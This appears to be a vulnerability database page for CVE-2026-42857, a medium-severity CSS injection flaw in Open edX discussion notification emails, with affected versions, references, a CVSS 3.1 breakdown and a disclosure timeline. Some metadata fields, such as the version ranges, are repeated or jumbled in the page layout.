CSS Injection Vulnerability in Open edX Platform by Open edX
CVE-2026-42857

4.6MEDIUM

Key Information:

Vendor: Openedx
Status: Openedx-platform
Vendor: CVE Published:; 11 May 2026

What is CVE-2026-42857?

The Open edX Platform is susceptible to a CSS injection vulnerability due to the inadequate sanitization of user-generated content in discussion notification emails. The failure of the HTML sanitizer clean_thread_html_body() to remove tags permits attackers to inject arbitrary CSS into the email body. This functionality is leveraged through Django’s |safe template filter, which can lead to various security risks such as email tracking, IP address exposure, and potential phishing attacks on affected users. The issue has been rectified in the latest updates.

Affected Version(s)

openedx-platform < cddc25cd791bb78f76833896e4778f668861df12 < cddc25cd791bb78f76833896e4778f668861df12

openedx-platform >= sumac, < ulmo < sumac, ulmo

References

https://github.com/openedx/openedx-platform/security/advi...

x_refsource_CONFIRM

https://github.com/openedx/openedx-platform/commit/cddc25...

x_refsource_MISC

CVSS V3.1

Score:

4.6

Severity:

MEDIUM

Confidentiality:

Low

Integrity:

Low

Availability:

Low

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

Low

User Interaction:

Required

Scope:

Unchanged

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
May 11, 2026
Vulnerability Reserved
Apr 30, 2026

CVE-2026-42857 Data

JSON

Openedx

What is CVE-2026-42857?

Affected Version(s)

References

CVSS V3.1

Timeline